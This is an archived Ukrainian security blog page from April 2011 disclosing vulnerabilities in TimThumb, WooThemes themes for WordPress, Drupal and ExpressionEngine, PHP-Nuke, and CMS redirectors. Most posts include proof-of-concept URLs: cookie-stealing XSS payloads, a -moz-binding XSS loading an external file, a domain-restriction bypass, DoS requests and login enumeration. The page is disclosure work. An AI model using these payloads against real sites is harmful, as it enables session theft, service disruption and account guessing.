Архів для категорії 'Уразливості'

Уразливості в багатьох темах для ExpressionEngine

15:13 19.04.2011

08.03.2011

Подібно до уразливостей в багатьох темах для Drupal, також уразливими є багато тем для ExpressionEngine. Зокрема шаблони того самого розробника, що і ранішезгадані шаблони для WordPress та Drupal.

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в наступних темах для ExpressionEngine: Fresh News, Inspire, City Guide, Delegate, Optimize, Bueno, Headlines, Daily Edition, Coffee Break, The Station, Over Easy. Це комерційні шаблони для ExpressionEngine від WooThemes. Про що вже повідомив розробникам, коли сповістив їх про попередні уразливості.

Детальна інформація про уразливості з’явиться пізніше.

19.04.2011

Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в даних темах такі ж самі як і в раніше згаданих 90 темах для WP та 10 темах для Drupal. Тому що дані шаблоні містять TimThumb, про уразливості в якому я вже писав.

Уразливі версії даних шаблонів з TimThumb 1.24 та попередні версіями. Окрім даних тем від WooThemes уразливими також можуть бути інші теми для ExpressionEngine (з TimThumb) від інших розробників. Ім’я вразливого скрипта в шаблонах може бути thumb.php або інше.

25.04.2011

Як нещодавно повідомив мені Bjorn Borresen, автор порту тем WooThemes для ExpressionEngine (щоб був найнятий WooThemes для переносу їхніх тем для цього движка), він зробив власну версію TimThumb для використання в EE, яку назвав Teemthumb. І в даній версії веб додатку використовуються інші підходи, що робить його не вразливим до даних атак. Що я перевірив, ознайомившись з його кодом (параметри скрипту передаються лише в коді шаблонів).

Враховуючи, що 6 березня я звертався до WooThemes з приводу їхніх тем для інших движків окрім WP і вони погодилися зі мною (і тим самим підтвердили, що дані теми вразливі) й нічого не сказали мені, що для якихось їхніх тем використовуються неоригінальні версії TimThumb, то дану неточність я залишу на їхній совісті.

Тому вищезазначені теми для EE не вразливі напряму до даних атак, на відміну від згаданих мною тем для WordPress, Drupal і Joomla (а також компонентів для Joomla). Але дані теми для EE можуть бути атаковані локально, при доступу до редагування тем. До того ж інші теми для EE, що використовують оригінальний TimThumb, будуть уразливими.

Добірка уразливостей

15:01 18.04.2011

В даній добірці уразливості в веб додатках:

Уразливості в багатьох темах для Drupal

20:17 16.04.2011

05.03.2011

Подібно до уразливостей в багатьох темах для WordPress, також уразливими є багато тем для Drupal. Зокрема шаблони того самого розробника, що і ранішезгадані шаблони для WP.

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в наступних темах для Drupal: Fresh News, Inspire, Spectrum, Delegate, Optimize, Bueno, Headlines, Daily Edition, Coffee Break, The Gazette Edition. Це комерційні шаблони для Drupal від WooThemes. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам тем.

16.04.2011

Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в даних темах такі ж самі як і в раніше згаданих 90 темах для WP від двох розробників. Тому що дані шаблоні містять TimThumb, про уразливості в якому я вже писав.

Уразливі версії даних шаблонів з TimThumb 1.24 та попередні версіями. Окрім даних тем від WooThemes уразливими також можуть бути інші теми для Drupal (з TimThumb) від інших розробників (і таких тем чимало). Якщо в шаблонах від WooThemes файл зветься thumb.php, то в інших шаблонах можуть використовуватися інші імена файлу, зокрема timthumb.php.

Добірка уразливостей

22:45 15.04.2011

В даній добірці уразливості в веб додатках:

XSS, AoF та IAA уразливості в PHP-Nuke

15:21 15.04.2011

16.03.2011

У січні, 15.01.2011, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

15.04.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Downloads

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0). Приклад експлоіту:

PHP-Nuke XSS.html

Abuse of Functionality:

http://site/modules.php?name=Your_Account&op=pass_lost

Через даний функціонал можна виявляти логіни в системі.

Insufficient Anti-automation:

Враховучи, що в даному функціоналі немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі (а також розсилку листів користувачам сайту). В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

Уразливі PHP-Nuke 8.1 та попередні версії. Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.

Редиректори в CMS №4

23:45 14.04.2011

Продовжуючи тему редиректорів в CMS пропоную вам нову добірку редиректорів.

В даних записах я наводжу приклади редиректорів в різних CMS (та інших веб додатках). Дані уразливості можна виявити майже на всіх сайтах, що використовують зазначені системи.

Редиректори в CMS движках:

Pligg Content Management System:

  • http://site/out.php?link=http://websecurity.com.ua

Вразливі лише старі версії Pligg CMS.

vBulletin (vbAnonymizer для vBulletin):

CMS WebManager-Pro:

Уразливість в темі Mimbo Pro для WordPress

16:05 14.04.2011

08.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Mimbo Pro для WordPress. Це комерційний шаблон для WP. Ця тема розроблена автором TimThumb, який і використовується в ній. Уразливості я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

14.04.2011

XSS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/mimbopro/

А також ще десятки php-скриптів шаблону в папці /mimbopro/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Уразливі Mimbo Pro 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив майже всі уразливості.

Уразливості в TimThumb і в багатьох темах для WordPress

15:23 13.04.2011

07.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в TimThumb. Це веб додаток що використовується в темах для WordPress. А по суті дані уразливості я виявив ще 08.12.2008, коли я вперше стикнуся з thumb.php. Про що найближчим часом повідомлю розробникам.

Уразливими є TimThumb та всі веб додатки (зокрема теми для WordPress), що його використовують. Це такі шаблони як Live Wire Edition, The Gazette Edition, Live Wire 2.0 та Live Wire Style.

А також наступні комерційні шаблони: Bookclub, Fresh News, BoldNews, Placeholder, Biznizz, Auld, Listings, Elefolio, Chapters, Continuum, Diner, Skeptical, Caffeinated, Crisp, Sealight, Unite, Estate, The Morning After, Coda, Inspire, Apz, Spectrum, Diarise, Boast, Retreat, City Guide, Cinch, Slanted, Canvas, Postcard, Delegate, MyStream, Optimize, Backstage, SophisticatedFolio, Bueno, Digital Farm, Headlines, f0101, Royalle, Exposure, Therapy, Rockstar, Daily Edition, Object, Antisocial, Coffee Break, Mortar, Big Easy, Mainstream, Groovy Photo, Groovy Blog, Feature Pitch, Suit and Tie, The Journal, myweblog, Aperture, Meta-Morphosis, Bloggingstream, The Station, Groovy Video, Productum, Newsport, Irresistible, Cushy, WooTube, Foreword Thinking, Geometric, Abstract, Busy Bee, BlogTheme, Gotham News, THiCK, Typebased, Over Easy, Ambience, Snapshot, Open Air, Fresh Folio, Papercut, ProudFolio, VibrantCMS, Flash News, NewsPress, The Original Premium News та інші шаблони для WP. Уразливості в даних шаблонах аналогічні діркам в вищеназваних шаблонах.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

13.04.2011

Веб додаток може розміщуватися в файлі thumb.php або timthumb.php.

XSS:

http://site/path/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/path/thumb.php?src=http://
http://site/path/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/path/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality:

http://site/path/thumb.php?src=http://site&h=1&w=1
http://site/path/thumb.php?src=http://site.google.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS:

http://site/path/thumb.php?src=http://site/big_file&h=1&w=1

Уразливі TimThumb 1.24 та попередні версії (та теми для WP з цими версіями). XSS можлива лише в старих версіях програми. В версіях до 1.22 можлива AoF навіть з включеним обмеженням на домени через використання обхідної техніки. Також можна проводити DoS атаки, коли великий файл розміщенний на тому самому сайті, що і php-скрипт, або на дозволеному домені. Або якщо в скрипті дозволені зовнішні сайти, то тоді можна проводити AoF та DoS атаки. В версії TimThumb 1.25 уразливості переважно виправлені.

Уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress

16:02 12.04.2011

05.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress. Це ще дві теми, що разом з Live Wire Edition входять до серії Live Wire. І вони також є комерційними шаблонами для WP від WooThemes. Які я виявив на одному сайті, що їх використовує. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі The Gazette Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам тем.

12.04.2011

XSS:

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire/thumb.php?src=jpg
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire/

А також ще 30 php-скриптів шаблону в папці /livewire/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire/, дані теми також можуть розміщуватися в папках /livewire-dev/ та /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire 2.0 та Live Wire Style версія 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблонів. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Добірка уразливостей

19:12 11.04.2011

В даній добірці уразливості в веб додатках: